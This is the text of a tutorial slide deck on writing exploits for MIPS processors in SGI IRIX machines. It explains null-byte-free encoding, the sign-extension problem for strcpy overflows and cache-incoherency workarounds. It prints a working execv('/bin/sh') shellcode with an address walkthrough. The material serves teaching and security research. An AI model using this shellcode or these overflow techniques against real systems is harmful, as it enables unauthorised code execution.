Writing MIPS exploits By Peter Werner peterw@ifost.org.au
Overview of presentation
• Take a look at the architecture
• Take a look at the instruction set
• Describe some of the issues that arise when developing exploits
• Look at some basic shellcode
• I will only be discussing MIPS processors found in SGI machines running 32-bit IRIX. I will completely ignore floating point numbers.
Overview of Architecture
• MIPS stands for 'Microprocessor without Interlocked Pipeline Stages'.
• MIPS Corp, now owned by SGI, was formed in 1984. The first CPU appeared in 1985.
• It is a 64-bit RISC architecture. Many problems discussed here are common to other 64-bit RISC architectures.
Pipelining
• It has a five-stage instruction pipeline.
• This means that at any given time up to five instructions are active in the CPU, each at a different stage of execution.
• Pipelines (along with aggressive caches) are what make RISC CPUs run fast.
• The five stages in MIPS are Instruction Fetch, Read Registers, Arithmetic/Logical Operation, Read/Write Data Cache and Write Back.
Instructions and Addressing
• All instructions are 32 bits long.
• Three-operand instructions
• 32 registers
• Memory references are always register loads/stores; there is no arithmetic on memory variables.
• Data is addressed using a signed 16-bit offset added to a base register value.
• The assembler synthesizes various instructions to represent different addressing modes.
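The base-plus-offset addressing described above can be sketched in a few lines of Python. This is only an illustration of the arithmetic, not anything from the original talk: the helper names `sign_extend16` and `effective_address` are made up here, and addresses are assumed to wrap at 32 bits as they would for a 32-bit IRIX process.

```python
def sign_extend16(imm):
    """Interpret the low 16 bits of imm as a signed two's-complement value."""
    imm &= 0xFFFF
    return imm - 0x10000 if imm & 0x8000 else imm


def effective_address(base, imm16):
    """Address used by a load/store: base register plus signed 16-bit offset.

    Assumption: the result wraps at 32 bits (32-bit address space).
    """
    return (base + sign_extend16(imm16)) & 0xFFFFFFFF


# lw r, 4(base) and lw r, -4(base) with base = 0x10001000
print(hex(effective_address(0x10001000, 0x0004)))
print(hex(effective_address(0x10001000, 0xFFFC)))
```

Because the offset is signed, "subtracting" from the base register is just a negative immediate in the same 16-bit field.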
Alignment
• Pretty much the same as other RISC architectures
• Loads and stores must be aligned
• Word loads/stores must be aligned on 4-byte boundaries
• Halfword loads/stores must be aligned on 2-byte boundaries
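As a quick sanity check when working out addresses by hand, the alignment rules above amount to a modulo test. The function name `is_aligned` is purely illustrative.

```python
def is_aligned(addr, size):
    """True if addr is a multiple of the access size (4 for words, 2 for halfwords)."""
    return addr % size == 0


print(is_aligned(0x10001004, 4))  # word access on a 4-byte boundary
print(is_aligned(0x10001006, 4))  # word access that would fault
print(is_aligned(0x10001006, 2))  # halfword access on a 2-byte boundary
```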
Stacks and Calling Conventions
• No real hardware support for a stack. You can make up your own calling conventions.
• There are no push/pop instructions, nor anything functionally equivalent to SPARC's save/restore instructions.
• There are 3 main calling conventions. The first is the old (or traditional) standard, referred to as o32.
• The others are n64 and n32, which share the same rules for parameter passing and are used when long and pointer types are 64 bits or 32 bits respectively.
• We will be working under n32.
Jumps and Branches
• There is only one real feature here: 'link' instructions (jump and link, branch and link).
• These link instructions perform the operation (jump, branch) and store the return address in a register.
• ra (register 31) is used by default, but another register can be specified.
• Yes, the return address is stored in a register.
Jumps and Branches cont.
• But, by convention, it is also saved on the stack on function entry, so it can still be overwritten.
• Return values are stored in v0 ($2) and, if need be, v1 ($3).
• System calls take their arguments in registers a0 ... a7 and the syscall number in v0. Integer return values will be in v0.
Branch Delay Slots
• Due to the pipelined architecture, the instruction immediately after a branch or jump (the delay slot) is executed before the branch takes effect.
• This is usually hidden from assembly programmers by the assembler, but that behaviour can be disabled if need be.
• For a branch-and-link instruction, the return address will be <branch instruction + 8>, ie the instruction after the delay slot.
Branch Delay Slots cont.
eg:
    0x10001000: bal foo
    0x10001004: move a0, t0
    0x10001008: move t0, v0
• So when the branch to foo is taken, move a0, t0 will be executed and ra ($31) will contain 0x10001008 (the address of move t0, v0).
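The addresses in this example follow directly from the "+ 8" rule. A small Python sketch, with hypothetical helper names, makes the arithmetic explicit:

```python
INSTRUCTION_SIZE = 4  # every MIPS instruction is 32 bits


def delay_slot_address(branch_addr):
    """Address of the instruction that runs in the branch delay slot."""
    return branch_addr + INSTRUCTION_SIZE


def link_address(branch_addr):
    """Return address stored by a linking branch: branch address + 8."""
    return branch_addr + 2 * INSTRUCTION_SIZE


bal = 0x10001000
print(hex(delay_slot_address(bal)))  # move a0, t0
print(hex(link_address(bal)))        # move t0, v0, the value placed in ra
```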
Integer register usage in n32 and n64
    $0        zero     Always zero (a la SPARC's %g0)
    $1        at       Reserved for the assembler
    $2,$3     v0,v1    Return value from functions, syscall #
    $4-$11    a0-a7    Function arguments
    $12-$15   t0-t3    Temporaries
    $24,$25   t8,t9    Temporaries (t4-t7 exist in o32)
    $16-$23   s0-s7    Saved registers
    $26,$27   k0,k1    Reserved for interrupt/trap handler
    $28       gp       Global pointer
    $29       sp       Stack pointer
    $30       s8/fp    Extra saved variable or frame pointer
    $31       ra       Return address
Instruction encoding
• As mentioned before, each instruction is 32 bits.
• Commonly, the higher-order 16 bits (31-16) describe the instruction and operands, with the lower-order bits (15-0) making up a 16-bit offset or immediate.
• This means that in shellcode using an instruction of this form, small constants (eg file descriptor numbers) will result in a null byte.
• This leads to constructs that can be somewhat confusing.
Instruction encoding cont.
• Sometimes the encoding of the register operands can also lead to null bytes, but this is usually easily avoided by using different registers.
• eg:
    beq zero, zero, foo -> \x10\x00\xff\xff
    beq t0, t0, foo     -> \x11\x8c\xff\xff
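The two beq encodings above can be reproduced with a small I-type encoder. This is a minimal sketch under a few stated assumptions: big-endian byte order (as on IRIX), the standard beq opcode 0x04, register numbers taken from the n32 table in this talk (zero = $0, t0 = $12), and a branch offset of 0xffff to match the bytes on the slide. The function names are illustrative only.

```python
import struct

BEQ_OPCODE = 0x04                 # standard MIPS opcode for beq
REG = {"zero": 0, "t0": 12}       # n32 numbering from the register table


def encode_i_type(opcode, rs, rt, imm16):
    """Pack opcode(6) | rs(5) | rt(5) | immediate(16) as a big-endian word."""
    word = (opcode << 26) | (rs << 21) | (rt << 16) | (imm16 & 0xFFFF)
    return struct.pack(">I", word)


def has_null_byte(encoded):
    """True if the encoded instruction would terminate a C string."""
    return b"\x00" in encoded


for reg in ("zero", "t0"):
    enc = encode_i_type(BEQ_OPCODE, REG[reg], REG[reg], 0xFFFF)
    print(reg, enc.hex(), "null byte" if has_null_byte(enc) else "ok")
```

Swapping zero for t0 changes only the two register fields, which is enough to push non-zero bits into the second byte.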
Some common instructions
    move r1, r2          move the value of r2 into r1
    add r1, r2, c        r1 = r2 + c (c a constant)
    subu r1, r2, c       r1 = r2 - c
    li r, c              load a sixteen bit integer c into register r
    la r, addr           load the addr into register r
    lw r, addr           load a word at addr into r
    sw r, addr           store the word in r at location addr
    syscall              cause a system call exception
    jr r                 jump to the address in register r
    jal label            jump to label, put the return address in ra
    b label              goto label
    bal label            goto label and put return address in ra
    beq r1, r2, label    if r1 == r2, goto label
    bltzal r1, label     branch if r1 is less than zero and link
A sample assembly program
        .data
sh:     .asciiz "/bin/sh"
        .text
LEAF(main)
        .set noreorder
        li      v0, 1011        # 1011 = syscall # of execv
        la      t0, sh          # load the address of sh string
        sw      t0, 0(sp)       # argv[0] = "/bin/sh"
        sw      zero, 4(sp)     # argv[1] = NULL
        move    a0, t0          # load address of string
        move    a1, sp          # load the address of argv
        syscall                 # execv("/bin/sh", argv)
END(main)
Common Constructs in Shellcode
• Loading a small number into a register without a null byte in the immediate field:
    li t5, 1234
    subu t5, (1234 - 1)
• t5 now has a value of 1
Common Constructs in Shellcode cont.
• Getting the current address:
    label: bltzal zero, label
           move t0, t0
           move a0, a0
• At the move a0, a0 instruction, the current address is in ra.
• zero is never less than zero, so the branch is never taken, but bltzal still writes the link address to ra.
• Since branch instructions are pc relative, bltzal zero, 0xffff will result in the address of the bltzal instruction + 8 being in ra.
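The bltzal trick can be checked numerically. The sketch below assumes the standard encoding (REGIMM opcode 0x01 with 0x10 in the rt field selecting bltzal), big-endian byte order, and the usual branch target rule of delay-slot address plus the sign-extended offset shifted left by two. The function names are made up for illustration.

```python
import struct

REGIMM_OPCODE = 0x01   # opcode shared by the "register-immediate" branches
BLTZAL_RT = 0x10       # rt field value that selects bltzal


def encode_bltzal(rs, imm16):
    """Encode bltzal rs, offset as a big-endian 32-bit word."""
    word = (REGIMM_OPCODE << 26) | (rs << 21) | (BLTZAL_RT << 16) | (imm16 & 0xFFFF)
    return struct.pack(">I", word)


def branch_target(pc, imm16):
    """Target of a pc-relative branch located at pc."""
    offset = imm16 & 0xFFFF
    if offset & 0x8000:
        offset -= 0x10000
    return (pc + 4 + (offset << 2)) & 0xFFFFFFFF


def link_address(pc):
    """Value written to ra by a linking branch located at pc."""
    return (pc + 8) & 0xFFFFFFFF


pc = 0x10001000
print(encode_bltzal(0, 0xFFFF).hex())   # null-free encoding
print(hex(branch_target(pc, 0xFFFF)))   # points back at the bltzal itself
print(hex(link_address(pc)))            # what ends up in ra
```

An offset of 0xffff (-1 words) targets the bltzal itself, which is why the comment in the sample shellcode describes it as branching back to ourselves, and it keeps the immediate field free of null bytes.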
Common Constructs in Shellcode cont.
• The nop instruction is encoded as 0x00000000. This is obviously bad if we want null-byte-free shellcode.
• You can use any harmless instruction that uses only registers and immediates, eg something like li t7, 0x1234
• The instruction encoded as 0x20202020 is also a nop
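Splitting 0x20202020 into its I-type fields shows why it behaves as a nop. The decoder below is a minimal sketch with a hypothetical function name; the field layout is the standard opcode(6), rs(5), rt(5), immediate(16).

```python
def decode_i_type(word):
    """Split a 32-bit instruction word into its I-type fields."""
    return {
        "opcode": (word >> 26) & 0x3F,
        "rs": (word >> 21) & 0x1F,
        "rt": (word >> 16) & 0x1F,
        "imm": word & 0xFFFF,
    }


fields = decode_i_type(0x20202020)
print(fields)
```

Opcode 8 is addi, the source register is $1 (at) and the destination is $0 (zero), so the word reads as addi zero, at, 0x2020. Writes to the zero register are discarded, which is what makes it usable as sled padding.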
Sign Extension
• My copy of IRIX is a 32-bit operating system running on a 64-bit architecture.
• Its registers are 64 bits wide. This means bits 63-32 go unused.
• How does the CPU know if a 32-bit value stored in a 64-bit space is positive or negative? It uses sign extension.
• Negative numbers have their highest-order bit (31) set to 1, while positive numbers have it set to 0.
• When a value is stored in a 64-bit space, bit 31 is copied to bits 32-63.
Sign Extension cont.
• eg, sign-extended 32-bit -2 looks like 0xfffffffffffffffe
• sign-extended 32-bit +2 looks like 0x0000000000000002
• Since userspace memory addresses are always positive, an address stored as 64 bits will always have four null bytes in it.
• It goes against the MIPS spec for any userspace address to have its higher-order bits set (ie the valid range is 0x0000000000000000 - 0x000000007fffffff).
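The sign-extension rule and its consequence for addresses can be sketched as follows. The function name is illustrative, and the sample address 0x7fff2f10 is an arbitrary value inside the userspace range, not one taken from a real process.

```python
import struct


def sign_extend_32_to_64(value):
    """Copy bit 31 of a 32-bit value into bits 32-63."""
    value &= 0xFFFFFFFF
    if value & 0x80000000:
        return value | 0xFFFFFFFF00000000
    return value


print(hex(sign_extend_32_to_64(-2)))
print(hex(sign_extend_32_to_64(2)))

# Hypothetical userspace address, stored as a big-endian 64-bit value.
stored = struct.pack(">Q", sign_extend_32_to_64(0x7FFF2F10))
print(stored.hex())
```

Any address at or below 0x7fffffff has bit 31 clear, so the upper four bytes of the stored value are always zero.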
Sign Extension cont.
• Take a typical strcpy buffer overflow. Our payload would look something like this:
    <nop sled><shellcode><return address>
• Since <return address> has four null bytes between it and the shellcode, strcpy will stop before overwriting the return address.
• This only really affects str* based overflows; memcpy overflows and format strings are usually ok.
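The effect on a strcpy-style copy can be simulated without any real payload. In this sketch the filler bytes stand in for the sled and shellcode, the return address is an arbitrary hypothetical value, and `strcpy_copied` is an illustrative model of where a C strcpy would stop, not a real library call.

```python
import struct


def strcpy_copied(src):
    """Bytes a C strcpy would copy from src, excluding the terminating NUL."""
    end = src.find(b"\x00")
    return src if end == -1 else src[:end]


filler = b"A" * 64                              # stand-in for <nop sled><shellcode>
return_address = struct.pack(">Q", 0x7FFF2F10)  # hypothetical 64-bit stored address
payload = filler + return_address

copied = strcpy_copied(payload)
print(len(payload), len(copied))
```

The copy ends at the first of the four leading null bytes, so none of the return address bytes are written. A length-based copy such as memcpy has no such stopping point.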
Cache Incoherency
• Cache incoherency can be tricky to get around. MIPS CPUs have two caches, one for data (the D-cache) and one for instructions (the I-cache). These caches are completely independent of each other.
• In a typical exploit, the shellcode will be read in by a vulnerable program and stored in some data buffer.
• So it will enter via the CPU's data cache.
• When the CPU starts to execute the shellcode, there is no guarantee that the data cache will have been written back to memory (and usually it hasn't).
Cache Incoherency cont.
• So when the shellcode is executed, the CPU will look in the I-cache for the instructions. There is no way our shellcode will be in the I-cache, so the I-cache will go back to main memory and fetch some instructions.
• Since our shellcode is still sitting in the D-cache, these instructions will not be what we want, and an error will occur.
• If the shellcode modifies itself, these modifications will be written to the data cache. So it's pretty important that the shellcode gets written back to memory.
• Cache incoherency usually manifests as the process receiving SIGILL (Illegal Instruction).
Cache Incoherency cont.
• There are two ways around this.
• First of all, use a big nop sled. Empirically, one page (4096 bytes) of nops seems to work pretty well. LSD payloads (nop sled + shellcode) usually go in 10000-byte buffers.
• This is a good technique for local exploits: just stick the payload in your environment and return to that.
Cache Incoherency cont.
• For remote exploits, where you usually don't have enough space for a big nop sled, make use of blocking syscalls.
• For example, write the shellcode to the remote side, but make the exploit sleep for a bit, then write the shellcode again (or something similar).
• The vulnerable service will sleep on the blocking syscall (say read(2)) and another process will be run. The context switch will alleviate the problem.
• LSD's telnetd remote used this technique. If I understand things correctly, the nop sled and shellcode fit in a 97-byte buffer.
Alignment
• I spoke about store/load alignment a bit before.
• Instructions must also be aligned on a word boundary.
• If not, the process will receive a SIGBUS (Bus Error).
• Since all instructions are 32 bits, it's usually pretty easy to sort this out: just have a look at your shellcode in a debugger.
• Sometimes cache incoherency can generate SIGBUS or SIGSEGV instead of SIGILL. So make sure you've taken care of that before moving on to further debugging.
Some Sample Shellcode
• execv("/bin/sh", argv) shellcode by the LSD group, 44 bytes.
• Our /bin/sh string begins at a 36-byte offset from bltzal, or 28 bytes from the first addi.
Some Sample Shellcode cont.
    bltzal  zero,0xffff     # branch back to ourselves
    li      v0,1011         # load execv syscall # in delay slot
    addi    ra,ra,276       # add a largish constant
    addi    a0,ra,-248      # a0 = ra + 28 == address of sh string
    addi    a1,ra,-240      # a1 = space after payload to build argv
    sw      a0,-240(ra)     # argv[0] = "/bin/sh"
    sw      zero,-236(ra)   # argv[1] = NULL
    sb      zero,-241(ra)   # null terminate our sh string
    syscall                 # execv("/bin/sh", argv)
Some Sample Shellcode cont.
    0x10001000: bltzal zero,0xffff
    0x10001004: li     v0,1011
    0x10001008: addi   ra,ra,276     # ra = 1000111c
    0x1000100c: addi   a0,ra,-248    # (28) 0x10001024
    0x10001010: addi   a1,ra,-240    # (36) 0x1000102c
    0x10001014: sw     a0,-240(ra)   # (36) 0x1000102c
    0x10001018: sw     zero,-236(ra) # (40) 0x10001030
    0x1000101c: sb     zero,-241(ra) # (35) 0x1000102b
    0x10001020: syscall
    0x10001024: "/bin"
    0x10001028: "/sh"
    0x1000102c: here we build our argv
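The annotated addresses in this listing can be re-derived from the load address alone, which is a useful check when adapting the offsets. The sketch below uses the listing's base address 0x10001000; the function names are hypothetical. It also checks a side effect of the "largish constant": each immediate used after biasing ra by 276 encodes without a null byte, whereas the direct offset 28 would not.

```python
import struct


def shellcode_addresses(base):
    """Recompute the addresses annotated in the listing for a given load address."""
    ra = base + 8         # bltzal links to its own address + 8
    biased = ra + 276     # addi ra,ra,276
    return {
        "ra_biased": biased,
        "sh_string": biased - 248,    # addi a0,ra,-248
        "argv": biased - 240,         # addi a1,ra,-240 and sw a0,-240(ra)
        "argv1": biased - 236,        # sw zero,-236(ra)
        "terminator": biased - 241,   # sb zero,-241(ra)
    }


def immediate_has_null(imm):
    """True if the 16-bit immediate field would contain a zero byte."""
    return b"\x00" in struct.pack(">h", imm)


for name, addr in shellcode_addresses(0x10001000).items():
    print(f"{name:12s} {addr:#010x}")

print([immediate_has_null(i) for i in (276, -248, -240, -236, -241)])
print(immediate_has_null(28))
```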
References
• LSD: http://www.lsd-pl.net
  - excellent docs on writing MIPS exploits
  - many IRIX exploits available
  - should be your first stop
  - also helped with the cache incoherency discussion in this presentation
• TESO: http://www.team-teso.net
  - has a doc by scut with more example MIPS shellcode
References cont.
• See MIPS Run by Dominic Sweetman
  - published by Morgan Kaufmann
  - great book on MIPS architecture
• IFOST: http://www.ifost.org.au/~peterw/mipstalk/
  - I'll put a sample vulnerable program and exploit up there
  - also put this talk as a .ppt and text file
  - feel free to email me with questions, peterw@ifost.org.au